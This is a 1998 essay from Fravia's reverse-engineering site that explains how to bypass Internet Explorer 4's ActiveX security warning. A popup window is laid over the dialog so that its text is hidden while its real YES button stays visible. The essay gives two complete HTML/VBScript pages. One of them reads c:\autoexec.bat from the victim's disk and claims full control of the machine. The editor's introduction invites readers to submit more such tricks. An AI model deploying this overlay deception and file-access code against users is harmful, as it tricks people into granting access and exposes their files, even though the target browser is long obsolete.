Behind the window |
||
10 July 1998 |
by Cryptopoulos |
|
Courtesy of Fravia's page of reverse engineering |
slightly edited |
|
fra_00xx 980710 Cryptopoulos 0100 NA PC |
HTML cracking! How else should we describe this nice essay by Cryptopoulos? Yes, it's easy stuff... once you have read it! Note also how some other tricks on the same light of thought could be used to implement even more subtile games... ok, I'm hopening an anti-MSIE contest right now: all readers that will send me the more innovative (and clever) implementations of this kind of tricks will not only get their essay published, but will also win one of the faboulous strategic gamez from the secret +HCU vault! Let's start a new section: anti-MSIE wars, and now enjoy this essay by Cryptopoulos! |
|
There is a crack, a crack in everything That's how the light gets in |
||
Rating |
(x)Beginner (x)Intermediate ( )Advanced ( )Expert |
Behind the window
How to bypass Micro$oft Internet Explorer security
Written by Cryptopoulos
Introduction |
When you click "YES" are you really responding to the true message box ?
This essay will show you how to bypass Micro$oft Internet Explorer security
using a very simple technique.
Tools required |
Text editor
Target's URL/FTP |
Micro$sotf Explorer Navigators (4.0 , I have not tested 3.x)
Essay |
When Micro$oft Internet Explorer detects that a Visual Basic Script included in an HTML page will access your file system a security alert dialog is displayed :
An ActiveX object
on this page may be unsafe.
Do you want to allow it to initialize and be accessed by scripts ?
Nobody with a minimum knowledge about ActiveX and VB Scripts would accept this dialog. If you click the "yes" button you have given FULL CONTROL of your machine to the VB Script code.
This essay will show you how to hide this dialog box and get FULL CONTROL over the victim machine.
The idea is very simple : just display a window over the security alert hiding the message and replacing it by another friendly message but keeping visible the buttons of the original message.
To do this you need to create two HTML pages the first one with the code you want to execute in the victim machine and the second one with the message overlapping the security alert.
Below is the HTML sample code to display the "autoexec.bat" file in the HTML document :
<html>
<head>
<title>ActiveX Bug</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>
<body>
<form method="POST" name="form1">
<p><textarea rows="24" name="S1"
cols="85"></textarea></p>
</form>
<p><script language="VBScript">
set wcover = window.open ("welcome.htm", "Welcome", "top =
190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no,
status=no")
Set fs = CreateObject("Scripting.FileSystemObject")
wcover.close
Set myfile = fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content
</script> </p>
</body>
</html>
The welcome.htm page with the nice message is like this :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<title>welcome</title>
</head>
<body bgcolor="#C0C0C0">
<div align="left">
<table border="0" width="306" height="62">
<tr>
<td width="300" height="56"><p
align="center"><strong>!!! You are Welcome !!!</strong></p>
<p align="center"><strong>Click YES to
continue</strong></td>
</tr>
</table>
</div>
</body>
</html>
Lets comment the code :
The instruction below will create the window hiding the security alert :
set wcover = window.open ("welcome.htm", "Welcome . . . )
Next instruction will generate the security alert because we are accesing the file system this prompt will be behind the welcome window :
Set fs = CreateObject("Scripting.FileSystemObject")
If the YES button is clicked we win .
Welcome window in no longer needed and we close it
wcover.close
At this point we are the owners of the machine as an example I will get the autoexec.bat file and display it in a text box. But you can do anything you want.
Set myfile =
fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content
Final Notes |
Never accept ActiveX scripts !!!
Before respond a dialog box think about the window behind .
Ob Duh |
Ob duh doesn't apply man, we are just pointing out orrible bugs inside M$IE, people should thank us!
You are deep inside fravia's page of reverse engineering, choose your
way out:
homepage links
search_forms +ORC students' essays academy database
reality cracking how to search javascript
wars
tools anonymity academy cocktails
antismut CGI-scripts mail_fravia+
Is reverse engineering legal?